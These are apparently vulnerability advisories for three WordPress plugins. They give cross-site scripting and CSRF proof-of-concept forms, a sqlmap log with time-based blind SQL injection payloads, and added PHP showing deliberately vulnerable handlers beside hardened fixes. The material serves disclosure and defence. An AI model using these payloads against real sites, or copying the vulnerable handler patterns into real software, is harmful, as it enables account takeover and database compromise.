[align=right]XSS vulnerabilities in three WordPress plugins:[/align]
1- WordPress Customize Youtube Videos 0.2 Cross Site Scripting
2- WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting
3- WordPress Advertisement Management 1.0 Cross Site Scripting
1- WordPress Customize Youtube Videos 0.2 Cross Site Scripting
Code:
Title: WordPress 'Customize Youtube Videos' Plugin
Version: 0.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download:
- https://wordpress.org/plugins/customize-youtube-videos/
- https://plugins.svn.wordpress.org/customize-youtube-videos/
Notified Vendor/WordPress: 2015-06-21

==========================================================
## Plugin description
==========================================================
This plugin lets you customize the Youtube videos you are going to embed in your posts and pages.

## CSRF/XSS vulnerabilities
==========================================================
Customized video settings are displayed unsanitized when pressing "Get the new embed code for your customized Youtube video".

PoC:
Log in as admin and submit the following form:

<form method="POST" action="[URL]/wp-admin/admin.php?page=customize-youtube-videos">
<input type="text" name="code" value="'></iframe></textarea><script>alert(1)</script>"><br />
<input type="text" name="start" value="'></iframe></textarea><script>alert(2)</script>"><br />
<input type="text" name="end" value="'></iframe></textarea><script>alert(3)</script>"><br />
<input type="text" name="autohide" value="'></iframe></textarea><script>alert(4)</script>"><br />
<input type="text" name="autoplay" value="'></iframe></textarea><script>alert(5)</script>"><br />
<input type="text" name="cc_load_policy" value="'></iframe></textarea><script>alert(6)</script>"><br />
<input type="text" name="controls" value="'></iframe></textarea><script>alert(7)</script>"><br />
<input type="text" name="loop" value="'></iframe></textarea><script>alert(8)</script>"><br />
<input type="text" name="rel" value="'></iframe></textarea><script>alert(9)</script>"><br />
<input type="text" name="showinfo" value="'></iframe></textarea><script>alert(10)</script>"><br />
<input type="submit">
</form>

## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
2- WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting
Code:
Title: WordPress 'Copy or Move Comments' Plugin
Version: 1.0.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download:
- https://wordpress.org/plugins/copy-or-move-comments/
- https://plugins.svn.wordpress.org/copy-or-move-comments/
Notified WordPress: 2015-06-21

==========================================================
## Plugin description
==========================================================
Using Copy/Move WordPress Plugin the admin can copy or move any comment from several types of pages to any other page!

## Vulnerabilities
==========================================================
Two POST parameters are printed unsanitized on the plugin's admin page.

PoC:
Log in as admin and submit the following form:

<form method="POST" action="[URL]/wp-admin/admin-ajax.php">
<input type="text" name="action" value="get_all_posts" readonly><br />
<input type="text" name="post_type" value="'</script><script> alert(1)</script>"><br />
<input type="text" name="action_type" value="'</script><script> alert(2)</script>"><br />
<input type="submit">
</form>

Some of the SQL queries are exploitable from the admin page.

SQLMAP log snippet:

POST parameter 'source_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
...
POST parameter 'target_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 174 HTTP(s) requests:
---
Parameter: source_post (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1 AND (SELECT * FROM (SELECT(SLEEP(5)))HzuL)&move_comment_id[]=1&target_post=10&action=action_move

Parameter: target_post (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects/wp422/wp-admin//admin.php?page=copy-move%26error=1&copy-move=move&all_post_types=post&source_post=1&move_comment_id[]=1&target_post=10 AND (SELECT * FROM (SELECT(SLEEP(5)))kBfe)&action=action_move
---

## Solution
==========================================================
No fix available

==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
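The two defects the advisory above reports, as an added example that is not code from the advisory or from the Copy or Move Comments plugin: a hypothetical admin-ajax handler that reflects `post_type` and `action_type` into a script block, and a comment-move query built by string interpolation, each followed by a hardened version (nonce and capability check, whitelisted values, JSON output, `$wpdb->prepare()` with `%d` placeholders). The `cm_*` function names, the nonce action and the `moderate_comments` capability are assumptions chosen for illustration.

```php
<?php
// Added example, not code from the advisory or from the plugin. Names
// (cm_* functions, nonce action, capability) are assumptions.

// --- Pattern the advisory describes --------------------------------------
// The AJAX handler reflects POST parameters into markup, and the move
// query interpolates post IDs straight into SQL.
function cm_get_all_posts_vulnerable() {
    $post_type   = $_POST['post_type'];
    $action_type = $_POST['action_type'];
    // A value such as   '</script><script>alert(1)</script>
    // terminates the script element early; the browser runs the remainder.
    echo "<script>var cm = {type:'$post_type', action:'$action_type'};</script>";
    wp_die();
}

function cm_move_comments_vulnerable( $source_post, $target_post ) {
    global $wpdb;
    // "1 AND (SELECT * FROM (SELECT(SLEEP(5)))x)" is spliced in verbatim,
    // which is the time-based blind injection sqlmap reported.
    return $wpdb->query(
        "UPDATE {$wpdb->comments} SET comment_post_ID = $target_post"
        . " WHERE comment_post_ID = $source_post"
    );
}

// --- Hardened version ----------------------------------------------------
add_action( 'wp_ajax_cm_get_all_posts', 'cm_get_all_posts_hardened' );

function cm_get_all_posts_hardened() {
    // The nonce defeats the cross-site form in the PoC; the page's own JS
    // obtains it from wp_create_nonce( 'cm_get_all_posts' ).
    check_ajax_referer( 'cm_get_all_posts', 'nonce' );
    if ( ! current_user_can( 'moderate_comments' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Whitelist instead of echo: the value must name a registered post
    // type and one of the two supported operations.
    $post_type   = sanitize_key( wp_unslash( $_POST['post_type'] ?? '' ) );
    $action_type = sanitize_key( wp_unslash( $_POST['action_type'] ?? '' ) );
    if ( ! post_type_exists( $post_type ) || ! in_array( $action_type, array( 'copy', 'move' ), true ) ) {
        wp_send_json_error( 'invalid post_type or action_type', 400 );
    }

    $ids = get_posts( array(
        'post_type'   => $post_type,
        'numberposts' => -1,
        'fields'      => 'ids',
    ) );
    // JSON leaves no HTML or JavaScript context for the client to break out of.
    wp_send_json_success( array(
        'post_type'   => $post_type,
        'action_type' => $action_type,
        'post_ids'    => $ids,
    ) );
}

function cm_move_comments_hardened( $source_post, $target_post, array $comment_ids ) {
    global $wpdb;
    $source_post = absint( $source_post );
    $target_post = absint( $target_post );
    $comment_ids = array_values( array_filter( array_map( 'absint', $comment_ids ) ) );
    if ( ! $source_post || ! $target_post || empty( $comment_ids ) ) {
        return 0;
    }
    // One %d placeholder per ID; $wpdb->prepare() casts every value, so the
    // sqlmap payload "1 AND (SELECT ... SLEEP(5) ...)" becomes the integer 1.
    $placeholders = implode( ',', array_fill( 0, count( $comment_ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "UPDATE {$wpdb->comments} SET comment_post_ID = %d"
        . " WHERE comment_post_ID = %d AND comment_ID IN ($placeholders)",
        array_merge( array( $target_post, $source_post ), $comment_ids )
    );
    return $wpdb->query( $sql );
}
```

Note that the sqlmap payloads in the log already carry a valid `_wpnonce`, so a nonce alone would not have stopped the injection; the nonce closes the CSRF path, and only `$wpdb->prepare()` (or `absint()` before interpolation) closes the SQL one.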
3- WordPress Advertisement Management 1.0 Cross Site Scripting
Code:
Title: WordPress 'Advertisement Management' Plugin
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download:
- https://wordpress.org/plugins/advertisement-management/
- https://plugins.svn.wordpress.org/advertisement-management/
Notified WordPress: 2015-06-21

==========================================================
## Plugin description
==========================================================
Advertisement Management lets you administrate all the blog advertisements directly from the blog backend.

## XSS/CSRF vulnerabilities
==========================================================
The settings on the admin page are vulnerable to XSS.

PoC:
Log in as admin and submit this form:

<form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update">
<input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br />
<input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br />
<input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br />
<input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br />
<input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br />
<input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br />
<input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br />
<input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br />
<input type="submit">
</form>

After having done this, some of the injected scripts will be executed when loading the front page of the site.

## Solution
==========================================================
No fix available

==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
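Advisories 1 and 3 share one pattern: an admin settings page that accepts `$_POST` without a nonce (so the cross-site PoC form is accepted) and echoes the submitted value back inside a `<textarea>` or attribute, where `</textarea><script>…` or `'></iframe></textarea><script>…` closes the element and runs. The following is an added example that is not code from either advisory or from the plugins themselves: a minimal vulnerable settings page, a hardened one (nonce, capability check, `esc_textarea()` on re-display, `wp_kses_post()` for users without `unfiltered_html`), and, for the Youtube plugin's numeric and flag fields, validation by type plus attribute escaping. The `am_*` and `cyv_*` function names, the nonce action, the reuse of the PoC field names as option names, and the 11-character `[A-Za-z0-9_-]` video ID pattern are assumptions.

```php
<?php
// Added example, not code from either advisory or from the plugins. The
// am_*/cyv_* names, nonce action, option names and video ID pattern are
// assumptions chosen for illustration.

// --- Pattern shared by advisories 1 and 3 ---------------------------------
function am_settings_page_vulnerable() {
    if ( isset( $_POST['Advertising_front_page'] ) ) {           // no nonce: CSRF
        update_option( 'Advertising_front_page', $_POST['Advertising_front_page'] );
    }
    // "</textarea><script>alert(1)</script>" ends the element and executes.
    echo '<form method="post"><textarea name="Advertising_front_page">'
        . get_option( 'Advertising_front_page', '' )
        . '</textarea><input type="submit"></form>';
}

// --- Hardened version ----------------------------------------------------
function am_slots() {
    return array( 'Advertising_front_page', 'Advertising_single_top', 'Advertising_below_footer' );
}

function am_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // Must match the field wp_nonce_field() renders below; a form hosted
    // on another origin cannot obtain it, so the request dies here.
    check_admin_referer( 'am_save_settings', 'am_nonce' );

    foreach ( am_slots() as $slot ) {
        if ( ! isset( $_POST[ $slot ] ) ) {
            continue;
        }
        $raw = wp_unslash( $_POST[ $slot ] );
        // Ad slots legitimately hold markup. Users without unfiltered_html
        // (multisite, custom roles) have it reduced to post-safe HTML.
        update_option( $slot, current_user_can( 'unfiltered_html' ) ? $raw : wp_kses_post( $raw ) );
    }
}

function am_settings_page_hardened() {
    if ( 'POST' === ( $_SERVER['REQUEST_METHOD'] ?? '' ) ) {
        am_save_settings();
    }
    echo '<form method="post">';
    wp_nonce_field( 'am_save_settings', 'am_nonce' );
    foreach ( am_slots() as $slot ) {
        // esc_textarea() encodes < > & " so stored HTML is displayed as
        // text inside the editor, never parsed.
        printf(
            '<p><label>%1$s<br><textarea name="%1$s" rows="4" cols="60">%2$s</textarea></label></p>',
            esc_attr( $slot ),
            esc_textarea( get_option( $slot, '' ) )
        );
    }
    echo '<input type="submit" value="Save"></form>';
}

// --- Advisory 1: the fields are an ID, numbers and flags, not free text ----
// Validate each by type, then escape for the attribute context it lands in.
function cyv_embed_code( array $input ) {
    $code = (string) ( $input['code'] ?? '' );
    if ( ! preg_match( '/^[A-Za-z0-9_-]{11}$/', $code ) ) {   // assumed ID format
        return '';   // nothing to embed; the PoC payload never reaches output
    }
    $params = array(
        'start' => absint( $input['start'] ?? 0 ),
        'end'   => absint( $input['end'] ?? 0 ),
    );
    foreach ( array( 'autohide', 'autoplay', 'cc_load_policy', 'controls', 'loop', 'rel', 'showinfo' ) as $flag ) {
        $params[ $flag ] = ( isset( $input[ $flag ] ) && '1' === (string) $input[ $flag ] ) ? 1 : 0;
    }
    $src    = 'https://www.youtube.com/embed/' . $code . '?' . http_build_query( $params );
    $iframe = '<iframe src="' . esc_attr( $src ) . '" allowfullscreen></iframe>';
    // The embed code is shown to the admin for copy-and-paste, so it is
    // escaped once more for the <textarea> that displays it.
    return '<textarea readonly rows="3" cols="80">' . esc_textarea( $iframe ) . '</textarea>';
}
```

The front-end execution described in advisory 3 is the stored half of the problem: ad slots are emitted as raw HTML by design, so the write path is what has to be gated. With the nonce in place, script reaches the front page only when an administrator who already holds `unfiltered_html` pastes it deliberately, which is the same trust WordPress extends to that capability elsewhere; `wp_kses_post()` strips `<script>` for everyone else.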